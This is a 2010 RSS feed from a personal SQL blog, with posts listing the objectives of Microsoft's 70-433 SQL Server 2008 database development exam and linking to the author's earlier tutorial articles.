<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>ToyboxCreations</title>
	<atom:link href="http://toyboxcreations.net/feed/" rel="self" type="application/rss+xml" />
	<link>http://toyboxcreations.net</link>
	<description>SELECT * FROM [My Life]</description>
	<lastBuildDate>Fri, 09 Jul 2010 14:34:49 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language></language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Quick Update</title>
		<link>http://toyboxcreations.net/2010/07/quick-update/</link>
		<comments>http://toyboxcreations.net/2010/07/quick-update/#comments</comments>
		<pubDate>Fri, 09 Jul 2010 12:07:40 +0000</pubDate>
		<dc:creator>Shannon Lowder</dc:creator>
				<category><![CDATA[Microsoft SQL]]></category>

		<guid isPermaLink="false">http://toyboxcreations.net/?p=1176</guid>
		<description><![CDATA[I'm currently working on a batch of 12 articles that will fill in details on the study guides I've published over the last week.  These articles are all a part of the training I've being putting myself through to take the 70-433 at the end of this month.
Heh.
Considering how busy I've been between work, getting [...]


Related posts:<ol><li><a href='http://toyboxcreations.net/2006/02/sql-101-update/' rel='bookmark' title='Permanent Link: SQL 101 &#8211; UPDATE'>SQL 101 &#8211; UPDATE</a></li>
<li><a href='http://toyboxcreations.net/2008/06/update-triggers/' rel='bookmark' title='Permanent Link: UPDATE Triggers'>UPDATE Triggers</a></li>
<li><a href='http://toyboxcreations.net/2005/01/project-1/' rel='bookmark' title='Permanent Link: Project 1'>Project 1</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>I'm currently working on a batch of 12 articles that will fill in details on the study guides I've published over the last week.  These articles are all a part of the training I've being putting myself through to take the 70-433 at the end of this month.</p>
<p>Heh.</p>
<p>Considering how busy I've been between work, getting ready for the reception, and my other side projects, I'm pretty happy to say I'm making great progress on creating these study materials.  I've also had a few requests to form a study group.  If you're interested in joining the group, please let me know.  Our next meeting is scheduled for Thursday next week.  The plan is to cover the materials I'm finishing up now, and go through them... hopefully I'll find ways of improving them before releasing them on the site.</p>
<p>If you have any other questions, send them in!  I'm here to help!</p>


<p>Related posts:<ol><li><a href='http://toyboxcreations.net/2006/02/sql-101-update/' rel='bookmark' title='Permanent Link: SQL 101 &#8211; UPDATE'>SQL 101 &#8211; UPDATE</a></li>
<li><a href='http://toyboxcreations.net/2008/06/update-triggers/' rel='bookmark' title='Permanent Link: UPDATE Triggers'>UPDATE Triggers</a></li>
<li><a href='http://toyboxcreations.net/2005/01/project-1/' rel='bookmark' title='Permanent Link: Project 1'>Project 1</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://toyboxcreations.net/2010/07/quick-update/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Microsoft Exam 70-433 (part 7)</title>
		<link>http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-7/</link>
		<comments>http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-7/#comments</comments>
		<pubDate>Wed, 07 Jul 2010 04:00:08 +0000</pubDate>
		<dc:creator>Shannon Lowder</dc:creator>
				<category><![CDATA[Microsoft SQL]]></category>

		<guid isPermaLink="false">http://toyboxcreations.net/?p=1140</guid>
		<description><![CDATA[I'm putting together a new series to cover the materials you'll need to  know in order to pass the 70-433.  Microsoft's exam that covers Database  Development using Microsoft SQL Server 2008.  I'm going to list the  topics covered in several posts, each one will include links to details  to those topics.  [...]


Related posts:<ol><li><a href='http://toyboxcreations.net/2010/06/microsoft-exam-70-433-part-4/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 4)'>Microsoft Exam 70-433 (part 4)</a></li>
<li><a href='http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-5/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 5)'>Microsoft Exam 70-433 (part 5)</a></li>
<li><a href='http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-6/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 6)'>Microsoft Exam 70-433 (part 6)</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>I'm putting together a new series to cover the materials you'll need to  know in order to pass the 70-433.  Microsoft's exam that covers Database  Development using Microsoft SQL Server 2008.  I'm going to list the  topics covered in several posts, each one will include links to details  to those topics.  If you have any questions, let me know!</p>
<p>Gathering Performance  Information (11 percent)</p>
<ul>
<li>
<div>Capture execution plans.<br />
This  objective may include but is not limited to: graphical execution plans;  SHOWPLAN</div>
</li>
<li>
<div>Gather trace  information by using the SQL Server Profiler.</div>
</li>
<li>
<div>Collect output from the Database  Engine Tuning Advisor.<br />
This objective may include but is not limited  to: prepare a workload</div>
</li>
<li>
<div>Collect information from system  metadata.<br />
This objective may include but is not limited to: Dynamic  Management Views (DMVs), catalog views</div>
</li>
</ul>


<p>Related posts:<ol><li><a href='http://toyboxcreations.net/2010/06/microsoft-exam-70-433-part-4/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 4)'>Microsoft Exam 70-433 (part 4)</a></li>
<li><a href='http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-5/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 5)'>Microsoft Exam 70-433 (part 5)</a></li>
<li><a href='http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-6/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 6)'>Microsoft Exam 70-433 (part 6)</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-7/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Microsoft Exam 70-433 (part 6)</title>
		<link>http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-6/</link>
		<comments>http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-6/#comments</comments>
		<pubDate>Mon, 05 Jul 2010 04:00:35 +0000</pubDate>
		<dc:creator>Shannon Lowder</dc:creator>
				<category><![CDATA[Microsoft SQL]]></category>

		<guid isPermaLink="false">http://toyboxcreations.net/?p=1138</guid>
		<description><![CDATA[I'm putting together a new series to cover the materials you'll need to  know in order to pass the 70-433.  Microsoft's exam that covers Database  Development using Microsoft SQL Server 2008.  I'm going to list the  topics covered in several posts, each one will include links to details  to those topics.  [...]


Related posts:<ol><li><a href='http://toyboxcreations.net/2010/06/microsoft-exam-70-433-part-4/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 4)'>Microsoft Exam 70-433 (part 4)</a></li>
<li><a href='http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-5/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 5)'>Microsoft Exam 70-433 (part 5)</a></li>
<li><a href='http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-7/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 7)'>Microsoft Exam 70-433 (part 7)</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>I'm putting together a new series to cover the materials you'll need to  know in order to pass the 70-433.  Microsoft's exam that covers Database  Development using Microsoft SQL Server 2008.  I'm going to list the  topics covered in several posts, each one will include links to details  to those topics.  If you have any questions, let me know!</p>
<p>Working with XML Data (12  percent)</p>
<ul>
<li>
<div>Retrieve relational data as XML.<br />
This objective may include but is not limited to: FOR XML</div>
</li>
<li>
<div>Transform XML data into relational  data.<br />
This objective may include but is not limited to: OPENXML,  sp_xml_preparedocument, sp_xml_removedocument</div>
</li>
<li>
<div>Query XML data.<br />
This objective  may include but is not limited to: XQUERY, XPATH</div>
</li>
<li>
<div>Manage XML data.<br />
This  objective may include but is not limited to: XML datatype, XML indexes,  XML schema collections</div>
</li>
</ul>


<p>Related posts:<ol><li><a href='http://toyboxcreations.net/2010/06/microsoft-exam-70-433-part-4/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 4)'>Microsoft Exam 70-433 (part 4)</a></li>
<li><a href='http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-5/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 5)'>Microsoft Exam 70-433 (part 5)</a></li>
<li><a href='http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-7/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 7)'>Microsoft Exam 70-433 (part 7)</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-6/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Microsoft Exam 70-433 (part 5)</title>
		<link>http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-5/</link>
		<comments>http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-5/#comments</comments>
		<pubDate>Fri, 02 Jul 2010 04:00:01 +0000</pubDate>
		<dc:creator>Shannon Lowder</dc:creator>
				<category><![CDATA[Microsoft SQL]]></category>

		<guid isPermaLink="false">http://toyboxcreations.net/?p=1136</guid>
		<description><![CDATA[I'm putting together a new series to cover the materials you'll need to  know in order to pass the 70-433.  Microsoft's exam that covers Database  Development using Microsoft SQL Server 2008.  I'm going to list the  topics covered in several posts, each one will include links to details  to those topics.  [...]


Related posts:<ol><li><a href='http://toyboxcreations.net/2010/06/microsoft-exam-70-433-part-4/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 4)'>Microsoft Exam 70-433 (part 4)</a></li>
<li><a href='http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-6/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 6)'>Microsoft Exam 70-433 (part 6)</a></li>
<li><a href='http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-7/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 7)'>Microsoft Exam 70-433 (part 7)</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>I'm putting together a new series to cover the materials you'll need to  know in order to pass the 70-433.  Microsoft's exam that covers Database  Development using Microsoft SQL Server 2008.  I'm going to list the  topics covered in several posts, each one will include links to details  to those topics.  If you have any questions, let me know!</p>
<p>Working with Additional SQL  Server Components (11 percent)</p>
<ul>
<li>
<div>Integrate Database Mail.</div>
</li>
<li>
<div>Implement full-text search.<br />
This objective may include but is not limited to: CONTAINS,  CONTAINSTABLE, FREETEXT, FREETEXTTABLE, STOPLIST</div>
</li>
<li>
<div>Implement scripts by using Windows  PowerShell and SQL Server Management Objects (SMOs).<br />
This objective  may include but is not limited to: cmdlets</div>
</li>
<li>
<div>Implement Service Broker  solutions.<br />
This objective may include but is not limited to:  services, queues, messages, message types, message validation,  contracts, activation procedures</div>
</li>
<li>
<div>Track data changes.<br />
This  objective may include but is not limited to: change tracking; database  audit specification; CHANGETABLE</div>
</li>
</ul>


<p>Related posts:<ol><li><a href='http://toyboxcreations.net/2010/06/microsoft-exam-70-433-part-4/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 4)'>Microsoft Exam 70-433 (part 4)</a></li>
<li><a href='http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-6/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 6)'>Microsoft Exam 70-433 (part 6)</a></li>
<li><a href='http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-7/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 7)'>Microsoft Exam 70-433 (part 7)</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-5/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Microsoft Exam 70-433 (part 4)</title>
		<link>http://toyboxcreations.net/2010/06/microsoft-exam-70-433-part-4/</link>
		<comments>http://toyboxcreations.net/2010/06/microsoft-exam-70-433-part-4/#comments</comments>
		<pubDate>Wed, 30 Jun 2010 04:00:27 +0000</pubDate>
		<dc:creator>Shannon Lowder</dc:creator>
				<category><![CDATA[Microsoft SQL]]></category>

		<guid isPermaLink="false">http://toyboxcreations.net/?p=1134</guid>
		<description><![CDATA[I'm putting together a new series to cover the materials you'll need to  know in order to pass the 70-433.  Microsoft's exam that covers Database  Development using Microsoft SQL Server 2008.  I'm going to list the  topics covered in several posts, each one will include links to details  to those topics.  [...]


Related posts:<ol><li><a href='http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-5/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 5)'>Microsoft Exam 70-433 (part 5)</a></li>
<li><a href='http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-6/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 6)'>Microsoft Exam 70-433 (part 6)</a></li>
<li><a href='http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-7/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 7)'>Microsoft Exam 70-433 (part 7)</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>I'm putting together a new series to cover the materials you'll need to  know in order to pass the 70-433.  Microsoft's exam that covers Database  Development using Microsoft SQL Server 2008.  I'm going to list the  topics covered in several posts, each one will include links to details  to those topics.  If you have any questions, let me know!</p>
<p>Applying Additional Query  Techniques (15 percent)</p>
<ul>
<li>
<div>Implement subqueries.<br />
This  objective may include but is not limited to: simple, correlated, scalar,  list, table valued</div>
</li>
<li>
<div>Implement CTE (common table  expression) queries.<br />
This objective may include but is not limited  to: recursive, non-recursive</div>
</li>
<li>
<div>Apply ranking functions.<br />
This  objective may include but is not limited to: RANK, PARTITION BY,  DENSE_RANK, OVER, ROW_NUMBER, NTILE</div>
</li>
<li>
<div>Control execution plans.<br />
This  objective may include but is not limited to: table hints, query hints</div>
</li>
<li>
<div>Manage international  considerations.<br />
This objective may include but is not limited to:  collations, defining custom errors, filtering data, sort order,  nvarchar, database collation, column collation</div>
</li>
</ul>


<p>Related posts:<ol><li><a href='http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-5/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 5)'>Microsoft Exam 70-433 (part 5)</a></li>
<li><a href='http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-6/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 6)'>Microsoft Exam 70-433 (part 6)</a></li>
<li><a href='http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-7/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 7)'>Microsoft Exam 70-433 (part 7)</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://toyboxcreations.net/2010/06/microsoft-exam-70-433-part-4/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Microsoft Exam 70-433 (part 3)</title>
		<link>http://toyboxcreations.net/2010/06/microsoft-exam-70-433-part-3/</link>
		<comments>http://toyboxcreations.net/2010/06/microsoft-exam-70-433-part-3/#comments</comments>
		<pubDate>Mon, 28 Jun 2010 04:00:47 +0000</pubDate>
		<dc:creator>Shannon Lowder</dc:creator>
				<category><![CDATA[Microsoft SQL]]></category>

		<guid isPermaLink="false">http://toyboxcreations.net/?p=1132</guid>
		<description><![CDATA[I'm putting together a new series to cover the materials you'll need to  know in order to pass the 70-433.  Microsoft's exam that covers Database  Development using Microsoft SQL Server 2008.  I'm going to list the  topics covered in several posts, each one will include links to details  to those topics.  [...]


Related posts:<ol><li><a href='http://toyboxcreations.net/2010/06/microsoft-exam-70-433-part-4/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 4)'>Microsoft Exam 70-433 (part 4)</a></li>
<li><a href='http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-6/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 6)'>Microsoft Exam 70-433 (part 6)</a></li>
<li><a href='http://toyboxcreations.net/2010/06/microsoft-exam-70-433-part-2/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 2)'>Microsoft Exam 70-433 (part 2)</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>I'm putting together a new series to cover the materials you'll need to  know in order to pass the 70-433.  Microsoft's exam that covers Database  Development using Microsoft SQL Server 2008.  I'm going to list the  topics covered in several posts, each one will include links to details  to those topics.  If you have any questions, let me know!</p>
<p>Working with Query Fundamentals  (21 percent)</p>
<ul>
<li>
<div>Query data by using <a href="http://toyboxcreations.net/2005/07/sql-101-select/">SELECT</a> statements.<br />
This objective may include but is not limited to: <a href="http://toyboxcreations.net/2005/08/sql-101-the-advanced-like-clauses/">LIKE</a>, <a href="http://toyboxcreations.net/2005/07/sql-101-select-filtering-results/"> WHERE</a>, <a href="http://toyboxcreations.net/2010/04/sorting-numbers-in-varchar-field/">ORDER BY</a>, <a href="http://toyboxcreations.net/2007/02/select-into/">INTO</a></div>
</li>
<li>
<div>Modify data by using <a href="http://toyboxcreations.net/2006/02/sql-101-insert/">INSERT</a>, <a href="http://toyboxcreations.net/2006/02/sql-101-update/"> UPDATE</a>, and <a href="http://toyboxcreations.net/2006/03/sql-101-%e2%80%93-delete/">DELETE </a>statements.<br />
This objective may include but is not  limited to: row constructors, DELETE FROM FROM, UPDATE FROM, <a href="http://toyboxcreations.net/2007/04/drop-and-truncate/">TRUNCATE  TABLE</a></div>
</li>
<li>
<div>Return data by  using the OUTPUT clause.<br />
This objective may include but is not  limited to: INSERTED, DELETED, INTO</div>
</li>
<li>
<div>Modify data by using MERGE  statements.<br />
This objective may include but is not limited to:  INSERTED, DELETED, OUTPUT</div>
</li>
<li>
<div>Implement aggregate queries.<br />
This objective may include but is not limited to: built-in aggregate  functions, GROUPING SETS, <a href="http://toyboxcreations.net/2005/11/sql-101-group-by/">GROUP BY</a>, <a href="http://toyboxcreations.net/2008/06/correlated-subqueries-in-a-having-clause/">HAVING</a></div>
</li>
<li>
<div>Combine datasets.<br />
This  objective may include but is not limited to: CROSS APPLY, OUTER APPLY,  all join types; <a href="http://toyboxcreations.net/2010/03/union-intersect-and-except/">UNION, UNION ALL, INTERSECT, EXCEPT</a></div>
</li>
<li>
<div>Apply built-in scalar functions.<br />
This objective may include but is not limited to: <a href="http://toyboxcreations.net/2005/04/string-manipulation-cast-and-convert/">CAST and CONVERT</a>;<a href="http://toyboxcreations.net/2005/02/string-manipulation-replace/"> REPLACE;</a> <a href="http://toyboxcreations.net/2010/03/converting-varchar-to-datetime/">LEN</a> and DATALENGTH; <a href="http://toyboxcreations.net/2005/03/string-manipulation-replace-patindex-and-regular-expressions/">PATINDEX</a> and CHARINDEX</div>
</li>
</ul>


<p>Related posts:<ol><li><a href='http://toyboxcreations.net/2010/06/microsoft-exam-70-433-part-4/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 4)'>Microsoft Exam 70-433 (part 4)</a></li>
<li><a href='http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-6/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 6)'>Microsoft Exam 70-433 (part 6)</a></li>
<li><a href='http://toyboxcreations.net/2010/06/microsoft-exam-70-433-part-2/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 2)'>Microsoft Exam 70-433 (part 2)</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://toyboxcreations.net/2010/06/microsoft-exam-70-433-part-3/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Microsoft Exam 70-433 (part 2)</title>
		<link>http://toyboxcreations.net/2010/06/microsoft-exam-70-433-part-2/</link>
		<comments>http://toyboxcreations.net/2010/06/microsoft-exam-70-433-part-2/#comments</comments>
		<pubDate>Fri, 25 Jun 2010 14:55:31 +0000</pubDate>
		<dc:creator>Shannon Lowder</dc:creator>
				<category><![CDATA[Microsoft SQL]]></category>

		<guid isPermaLink="false">http://toyboxcreations.net/?p=1118</guid>
		<description><![CDATA[I'm putting together a new series to cover the materials you'll need to  know in order to pass the 70-433.  Microsoft's exam that covers Database  Development using Microsoft SQL Server 2008.  I'm going to list the  topics covered in several posts, each one will include links to details  to those topics.  [...]


Related posts:<ol><li><a href='http://toyboxcreations.net/2010/06/microsoft-exam-70-433/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433'>Microsoft Exam 70-433</a></li>
<li><a href='http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-6/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 6)'>Microsoft Exam 70-433 (part 6)</a></li>
<li><a href='http://toyboxcreations.net/2010/06/microsoft-exam-70-433-part-4/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 4)'>Microsoft Exam 70-433 (part 4)</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>I'm putting together a new series to cover the materials you'll need to  know in order to pass the 70-433.  Microsoft's exam that covers Database  Development using Microsoft SQL Server 2008.  I'm going to list the  topics covered in several posts, each one will include links to details  to those topics.  If you have any questions, let me know!</p>
<p>Implementing Programming  Objects (16 percent)</p>
<ul>
<li>
<div>Create and alter <a href="http://toyboxcreations.net/2006/04/sql-201-create-procedure/">stored  procedures</a>.<br />
This objective may include but is not limited to:  table-valued parameters (TVPs), EXECUTE AS, RECOMPILE, <a href="http://toyboxcreations.net/2008/09/variables-and-parameters/">parameter  direction (output)</a>; WITH ENCRYPTION; manage permissions (<a href="http://toyboxcreations.net/2006/10/sql-102-grant/">GRANT</a>, <a href="http://toyboxcreations.net/2008/05/sql-102-deny/">DENY</a>,  <a href="http://toyboxcreations.net/2008/05/sql-102-revoke/">REVOKE</a>)</div>
</li>
<li>
<div>Create and alter  <a href="http://toyboxcreations.net/2006/08/sql-201-user-defined-functions/">user-defined functions</a> (UDFs).<br />
This objective may include but is  not limited to: WITH SCHEMABINDING, EXECUTE AS; manage permissions(<a href="../2006/10/sql-102-grant/">GRANT</a>, <a href="../2008/05/sql-102-deny/">DENY</a>,  <a href="../2008/05/sql-102-revoke/">REVOKE</a>)</div>
</li>
<li>
<div>Create and alter <a href="http://toyboxcreations.net/2008/08/triggers-overview/">DML triggers</a>.<br />
This objective may include but is not limited to: <a href="http://toyboxcreations.net/2008/05/insert-triggers/">INSERTED</a>, <a href="http://toyboxcreations.net/2008/07/delete-triggers/">DELETED</a>,  <a href="http://toyboxcreations.net/2008/09/instead-of-triggers/">INSTEAD OF</a>, EXECUTE AS</div>
</li>
<li>
<div>Create and alter <a href="http://toyboxcreations.net/2008/10/ddl-triggers/">DDL triggers</a>.<br />
This objective may include but is not limited to: enabling/disabling;  return event data</div>
</li>
<li>
<div>Create and deploy CLR-based  objects.<br />
This objective may include but is not limited to:  permission sets (SAFE, UNSAFE, EXTERNAL_ACCESS), SET TRUSTWORTHY</div>
</li>
<li>
<div>Implement error handling.<br />
This  objective may include but is not limited to: <a href="http://toyboxcreations.net/2007/08/exception-handling/">TRY/CATCH</a>, <a href="http://toyboxcreations.net/2008/01/return-a-successfailure-to-a-job-based-on-a-sql-query/">RAISERROR</a>,  retrieving error information, custom error messages, <a href="http://toyboxcreations.net/2008/06/error-number/">@@ERROR</a></div>
</li>
<li>
<div>Manage transactions.<br />
This  objective may include but is not limited to: <a href="http://toyboxcreations.net/2006/03/sql-101-transaction/">BEGIN TRANSACTION, COMMIT,  ROLLBACK</a>, <a href="http://toyboxcreations.net/2009/03/set-transaction-isolation-level/">SET TRANSACTION ISOLATION LEVEL</a></div>
</li>
</ul>


<p>Related posts:<ol><li><a href='http://toyboxcreations.net/2010/06/microsoft-exam-70-433/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433'>Microsoft Exam 70-433</a></li>
<li><a href='http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-6/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 6)'>Microsoft Exam 70-433 (part 6)</a></li>
<li><a href='http://toyboxcreations.net/2010/06/microsoft-exam-70-433-part-4/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 4)'>Microsoft Exam 70-433 (part 4)</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://toyboxcreations.net/2010/06/microsoft-exam-70-433-part-2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Microsoft Exam 70-433</title>
		<link>http://toyboxcreations.net/2010/06/microsoft-exam-70-433/</link>
		<comments>http://toyboxcreations.net/2010/06/microsoft-exam-70-433/#comments</comments>
		<pubDate>Wed, 23 Jun 2010 12:25:27 +0000</pubDate>
		<dc:creator>Shannon Lowder</dc:creator>
				<category><![CDATA[Microsoft SQL]]></category>

		<guid isPermaLink="false">http://toyboxcreations.net/?p=957</guid>
		<description><![CDATA[I'm putting together a new series to cover the materials you'll need to know in order to pass the 70-433.  Microsoft's exam that covers Database Development using Microsoft SQL Server 2008.  I'm going to list the topics covered in several posts, each one will include links to details to those topics.  If you have any [...]


Related posts:<ol><li><a href='http://toyboxcreations.net/2010/06/microsoft-exam-70-433-part-2/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 2)'>Microsoft Exam 70-433 (part 2)</a></li>
<li><a href='http://toyboxcreations.net/2010/06/microsoft-exam-70-433-part-4/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 4)'>Microsoft Exam 70-433 (part 4)</a></li>
<li><a href='http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-6/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 6)'>Microsoft Exam 70-433 (part 6)</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>I'm putting together a new series to cover the materials you'll need to know in order to pass the 70-433.  Microsoft's exam that covers Database Development using Microsoft SQL Server 2008.  I'm going to list the topics covered in several posts, each one will include links to details to those topics.  If you have any questions, let me know!</p>
<p>The first topic covered is Implementing Tables and Views and makes up approximately 14 percent of the exam.</p>
<ul>
<li>
<div><a href="http://toyboxcreations.net/2006/04/sql-101-–-create-table/ ">Create</a> and <a href="http://toyboxcreations.net/2007/02/alter-table/">alter tables</a>.<br />
This  objective may include but is not limited to: <a href="http://toyboxcreations.net/2007/07/computed-columns/">computed and persisted  columns</a>; <a href="http://toyboxcreations.net/2007/06/schema/">schemas</a>; <a href="http://toyboxcreations.net/2008/08/procedural-transact-sql-batches">scripts to deploy changes to multiple environments</a> (for example: development, test, production); manage permissions (<a href="http://toyboxcreations.net/2006/10/sql-102-grant/">GRANT</a>, <a href="http://toyboxcreations.net/2008/05/sql-102-deny/">DENY</a>, <a href="http://toyboxcreations.net/2010/06/sql-102-revoke/ "> REVOKE</a>)</div>
</li>
<li>
<div><a href="http://toyboxcreations.net/2006/08/sql-201-views/">Create and alter  views</a>.<br />
This objective may include but is not limited to: <a href="http://toyboxcreations.net/2010/06/sql-301-views/">WITH  ENCRYPTION; WITH SCHEMABINDING; WITH CHECK OPTION</a>; manage permissions  (<a href="../2006/10/sql-102-grant/">GRANT</a>, <a href="../2008/05/sql-102-deny/">DENY</a>, <a href="../2010/06/sql-102-revoke/"> REVOKE</a>)</div>
</li>
<li>
<div><a href="http://toyboxcreations.net/2006/11/sql-201-indexes/">Create and alter indexes</a>.<br />
This  objective may include but is not limited to: <a href="http://toyboxcreations.net/2009/05/asc-desc-and-filtered-views/">filtered</a>, <a href="http://toyboxcreations.net/2009/03/sql-301-indexes-with-included-columns/">included  columns</a>, <a href="http://toyboxcreations.net/2009/01/sql-201-unique-index/">unique</a>, <a href="http://toyboxcreations.net/2009/01/sql-201-clustered-vs-nonclustered-indexes/">clustered, non-clustered</a>, <a href="http://toyboxcreations.net/2010/06/sql-401-fillfactor-and-indexes/">FILL FACTOR</a>; <a href="http://toyboxcreations.net/2006/12/sql-201-statistics/">CREATE  STATISTICS</a>; <a href="http://toyboxcreations.net/2009/01/sql-201-unique-index/">indexing views</a></div>
</li>
<li>
<div><a href="http://toyboxcreations.net/2007/10/sql-201-contstraints/">Create and modify constraints</a>.<br />
This objective may include but is not limited to: <a href="http://toyboxcreations.net/2006/09/sql-201-primary-keys/">PRIMARY KEY</a>, <a href="http://toyboxcreations.net/2007/01/sql-201-foreign-keys/">FOREIGN  KEY</a>, <a href="http://toyboxcreations.net/2007/10/sql-201-contstraints/">UNIQUE, CHECK</a>, <a href="http://toyboxcreations.net/2009/03/referential-integrity/">cascading referential integrity</a>, <a href="http://toyboxcreations.net/2009/04/disabling-constraints/">enabling/disabling,  NOCHECK</a>; <a href="http://toyboxcreations.net/2009/04/set-identity_insert/">SET IDENTITY_INSERT</a></div>
</li>
<li>
<div>Implement data types.<br />
This  objective may include but is not limited to: <a href="http://msdn.microsoft.com/en-us/library/cc949109%28SQL.100%29.aspx" target="_blank">FILESTREAM</a>; <a href="http://msdn.microsoft.com/en-us/library/bb933876.aspx" target="_blank">spatial</a>,  structured, and semi-structured; collations</div>
</li>
<li>
<div>Implement partitioning solutions.<br />
This objective may include but is not limited to: partitioned tables  and indexes (constraints, partition functions, partition schemes, MERGE,  SPLIT, SWITCH); distributed partitioned views (constraints, linked  servers)</div>
</li>
</ul>
<p>If you have questions on any of these topics, please let me know.   I'll build more articles around the questions I receive.  That way, as I prepare to finally take my Certification Exams, you'll be able to learn from it!  It's win-win!</p>


